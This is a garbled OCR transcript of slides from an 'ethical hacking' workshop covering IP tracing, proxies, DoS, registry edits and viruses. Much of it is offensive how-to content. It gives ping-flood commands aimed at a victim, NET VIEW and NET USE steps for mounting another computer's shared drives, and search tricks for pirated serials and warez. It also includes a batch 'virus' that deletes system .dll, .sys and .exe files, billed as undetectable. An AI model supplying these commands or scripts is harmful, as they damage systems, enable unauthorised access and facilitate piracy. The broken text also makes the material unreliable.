Workshop Day1

8/8/2019 Workshop Day1

http://slidepdf.com/reader/full/workshop-day1 1/43

Information Security andEthical hacking

www.informationsecurityclub.com



Internet Protocol(ip)Tracing ipDenial of services(DoS)SharingUnwanted AccessUsing proxies

Windows HackRegistry editingMulti yahooChanging names of

icons.Disabling features-

shutdown,restart etc.

Tips on Google surfingRapid share

viruses,trojans,worms

PhisersTools

Brutus-brute forcesWindows passwordBackdoor Entry

TrojansRemote employing monitors

Other malicious tools

Day 1 Day 2

Binders

Key loggingWindows passwordEtc..




Ethical Hacking

From E-commerce to information gathering and entertainment, the Internet hasevolved into a one-stop resource for both professional and personal purposes.

Unfortunately, the same Internet is also used by computer criminals to carry out cyber

crimes, such as identity theft and virus/worm/Trojan attacks, etc.

Ethical hackers are the sentinels of the Internet. Their work involves understandingthe mind of the cyber criminal, tracing and tracking his functioning, and innovatingnew strategies and methods to safeguard online activity.

Thinking like cyber criminals to thwart them is both a challenging and interesting job. And with the demand for certified ethical hackers increasing everyday, a career inthis field is also evolving into a professionally satisfying and monetarily lucrativeoption.




WHO AREHACKERS?




WHO ARE HACKERS?

Anarchist HackersTheir sole intent on system infiltration is to cause damage or use information to

create havoc.

HackersThey don t particularly care about bragging about their accomplishments as it

exposes them to suspicion. They prefer to work from behind the scenes andpreserve their anonymity.

Crackers

This is primarily the term given to individuals who are skilled at the art of bypassing software copyright protection.




Ethical Hacker

Being able to attribute your attacks to the right type of attacker isvery important. By identifying your attacker to be either anAnarchist Hacker or a Hacker you get a better idea of what you reup against.

Know your enemy and know yourself and you will always bevictorious...




Ip Address

32 bits combination.Staticdynamic

own ip.Ipconfigwww.whatismyip.comwww.danasoft.com

server ip addressping www.anylan.innslookup www.anylan.inwww.whois.se




ip tracingtracert www.anylan.in

Tracing ip during chatting

Netstat nNetstat -a

Port 5050 or 5101

Tracing the ip locations




E-mail Headers




E-mail headers




E-mail Headers




Neo trace pro




Proxywww.russianproxy.com

www.kproxy.com

www.cooltunnel.com

www.mathtunnel.com

hidemyip




D oS Attack

Conceptually, DoS attacks are intended to prevent legitimateusers, customers or clients of a site from successfully accessingit.

Traditional DoS attacks have been aimed at consuming

resources or disrupting services at the network or operatingsystem level.Typical examples are server-based attacks such as SYN floods

and bandwidth exhaustion attacks that attempt to saturate thevictim¶s Internet connection with spurious traffic.

Death by overloading of system.




DO S Attack

D enial O f Services

In a denial-of-service (D

oS) attack, an attacker attempts to prevent legitimate usersfrom accessing information or services. By targeting your computer and its networkconnection, or the computers and network of the sites you are trying to use, anattacker may be able to prevent you from accessing email, web sites, online accounts(banking, etc.), or other services that rely on the affected computer.

p ing [IP ADDRESS HERE or WEBSITE] -t -l 15000




D os & ddos

O versized Packets

This is called the "Ping of D eath" (ping -1 65510 192.168.2.3) an a Windows system

(where 192.168.2.3 is the IP adress of the intended victim). What is happening is theattacker is pinging every port on the victims computer causing it to echo back 65510requests.

The main goals of the "Ping of D eath" is to generate a packet size that exceeds 65,535bytes. Which can abrubtly cause the victim computer to crash.




D os

Ping Attack




D oS




Symptoms O f D os

unusually slow network performance (opening files or accessing web sites)

unavailability of a particular web site

inability to access any web site

dramatic increase in the amount of spam you receive in your account




NetBios

Network Basic Input O utput System and is used as a way for computers in a LAN ora WAN (local network or internet/wider network) to share printers or drives.

WAN attack that will be more interesting for most of you guys, and it is the WANattack that will be more dangerous.




Ste p s

Start up your terminal (Start > run > cmd). You will be given this prompt:C:\WINDO WS>make sure the host is alive:

C:\WINDO WS> ping 10.1.1.3If it is, you'll get something like this in response:Reply from 10.1.1.3: byte=32 time<1ms TTL=128

Which means your target is up.We then probe this target to see if it is sharing anything:

C:\WINDO WS> NBtSTAT -a 10.1.1.3HACKME-921J <00> UNIQUE Registered

MSHO ME <00> GRO UP RegisteredHACKME-921J <03> UNIQUE Registered

HACKME-921J <20> UNIQUE RegisteredMSHO ME <1E> GRO UP RegisteredHACKABLEUSER <03> UNIQUE RegisteredMSHO ME <1D > UNIQUE Registered<20>? That means that the target has files/folders/drives/etc. being shared on

that computer




C:\WINDO WS> NET VIEW \\10.1.1.3Which will hopefully give a response like this:

Shared resources on 10.1.1.3Share name Type Comment

--------------------------------------------C D isk

D D iskCommand completed successfully.

mount them locally:C:\WINDO WS> NET USE G: \\10.1.1.3\CCommand completed successfully.

go to "My Computer" and browse those files.




serials

In the search field type: "Product name" 94FBR

Where, "Product Name" is the name of the item you want to find the serialnumber for.

94FBR is part of a O ffice 2000 Pro cd key that is widely distributed as it bypassesthe activation requirements of O ffice 2K Pro. By searching for the product nameand 94fbr, you guarantee two things.1) The pages that are returned are pages dealing specifically with the product

you're wanting a serial for.

2) Because 94FBR is part of a serial number, and only part of a serial number, youguarantee that any page being returned is a serial number list page.




Unlimited Rapidshare download

go to temporary internet files folder and delete all the cookies related to rapidshare.

make a bat file and run it every timeipconfig /flushdnsipconfig /releaseipconfig /renewexit

turn off on ur modem




O ther google ways

Look for Appz in Parent D irectory

intext:"parent directory" intext:"[EXE]"

intext:"parent directory" index of:"[EXE]"

intext:"parent directory" index of:"[RAR]"

This will look for any exe or optionaly for zip, rar, ace, iso, bin and etc.

Look for Moviez in Parent D irectory

intext:"parent directory" intext:"[VI D ]"




intext:"parent directory" index of:"[VI D ]"

This will look for any video filetype in parent directory. You can optionaly addindex:"xvid" or intext:"divx" for specific codec movie.

Look for Muzik in Parent D irectory

intext:"parent directory" intext:"[MP3]"

intext:"parent directory" index of:"[MP3]"

This will look for any music files.

Look for Gamez in Parent D irectory

intext:"parent directory" index of:"[Gamez]"




RegistryThe Registry is a database used to store settings and options for the 32 bit

versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. Itcontains information and settings for all the hardware, software, users, andpreferences of the PC. Whenever a user makes changes to a Control Panelsettings, or File Associations, System Policies, or installed software, the

changes are reflected and stored in the Registry.The physical files that make up the registry are stored differently depending

on your version of Windows; under Windows 95 & 98 it is contained in twohidden files in your Windows directory, called USER.DAT and SYSTEM.DAT,for Windows Me there is an additional CLASSES.DAT file, while under

Windows NT/2000 the files are contained seperately in the%SystemRoot%\System32\Config directory. You can not edit these filesdirectly, you must use a tool commonly known as a "Registry Editor" to makeany changes (using registry editors will be discussed later in the article).




The Registry has a hierarchal structureThere are six main branches, each containing a specific portion of the

information stored in the Registry. They are as follows:

* HKEY_CLASSES_ROOT - This branch contains all of your file associationmappings to support the drag-and-drop feature, OLE information, Windowsshortcuts, and core aspects of the Windows user interface.

* HKEY_CURRENT_USER - This branch links to the section of HKEY_USERSappropriate for the user currently logged onto the PC and cont ai ns inform a tion such a s logon n a mes, d esktop sett ings, a n d S ta rt menu sett ings.

* HKEY_LOCAL_MACHINE - This branch cont ai ns computer spec if ic inform a tion ab out the type of h a r dwa re, soft wa re, a n d other preferences on a g iven PC , this information is used for all users who log onto this computer.

* HKEY_USERS - This branch cont ai ns in divid u al preferences for e a ch user of the computer , each user is represented by a SID sub-key locatedunder the main branch.

* HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current h a r dwa re conf igur a tion.

* HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use wi th the Pl ug-&- Play fe a tures of Win d o w s, th is sect ion is dy m a n ic a n d will ch a nge a s d e vices a re add e da n d remo ve d from the s ystem.




Each registry value is stored as one of five main data types:

* REG_BINARY - This type stores the value as raw bi n a r y da ta . Most

hardware component information is stored as binary data, and can be displayedin an editor in hexadecimal format.* REG_DWORD - This type represents the data by a four by te num b er and is

commonly used for b oo le a n val ues , such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, andcan be displayed in REGEDT32 in binary, hexadecimal and decimal format, or

in REGEDIT in hexadecimal and decimal format.* REG_EXPAND_SZ - This type is an exp a n dabl e da ta str ing that is stringcontaining a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced bythe actual location of the directory containing the Windows NT system files.(This type is only available using an advanced registry editor such asREGEDT32)

* REG_MULTI_SZ - This type is a mu ltip le str ing used to represent valuesthat contain lists or multiple values, each entry is separated by a NULLcharacter. (This type is only available using an advanced registry editor such asREGEDT32)

* REG_SZ - This type is a st a n da r d str ing , used to represent human readabletext values.




Playing With RegistryTake backup of the registry

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]"SetupType"=dword:00000000"CmdLine"="setup -newsetup""SystemPrefix"=hex:c5,0b,00,00,00,40,36,02

Deleting the key values[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]

Use this feature with care, as deleting the wrong key or value could causemajor problems within the registry, so remember to always make a backupfirst.




[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

NoClose"="1³

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoDrives"=dword:03ffffff $[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio

n\Winlogon]

"LegalNoticeCaption"="Caption here."




Multiple yahoo login

Navigate to HKEY_CURRENT_USER\Software\Yahoo\Pager\Test.

On the right page, right-click and choose new Dword value.

Rename the value to Plural.

Double click and assign a decimal value of 1




Viruses , Worms and Trojans

Types of virusesThere are many type of viruses. Typical viruses are simply programs or scriptsthat will do various damage to your computer, such as corrupting files, copyingitself into files, slowly deleting all your hard drive etc.

WormsWorms are different type of viruses, but the same idea, but they are usuallydesigned to copy themselves a lot over a network and usually try to eat up asmuch bandwidth as possible by sending commands to servers to try to get in.

TrojansTrojans are another type of virus. They are simply like a server in which enableshackers to get into and control the computer. A trojan such as Subseven canenable a hacker to do various things such as control the mouse, eject the cd-romdrive, delete/download/upload files and much more.




Viruses , Worms and Trojans

MBR virusesBoot sector viruses are another type, they are similar to file viruses, but insteadthey go in the boot sector and can cause serious damage when the computer isbooted, some can easily format your drive simply by booting your computer.These are hard to remove.

.exe .com .bat .scr .pif .vbs

E-mail,p2p

the main thing to watch out for is the file size.

Icons,binders




Making a virus

This virus is indetectible by antivirus scanners.open notepad and past this code:

Code:@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys this will deleteall .dll and .sys files.

Code:@Echo off c: cd %WinDir%\System\ deltree /y *. p sw cd\ deltree /y *.exe




Vbs-vb script


onclick=msgbox ("H@CKED",20,"H@CKED")yesclick=msgbox ("H@CKED",20,"H@CKED")yesclick=msgbox ("H@CKED",20,"H@CKED")yesclick=msgbox ("H@CKED",20,"H@CKED")yesclick=msgbox ("H@CKED",20,"H@CKED")yesclick=msgbox ("H@CKED",20,"H@CKED")



crash


StartStartStartStart

Workshop Day1

Documents

Transcript of Workshop Day1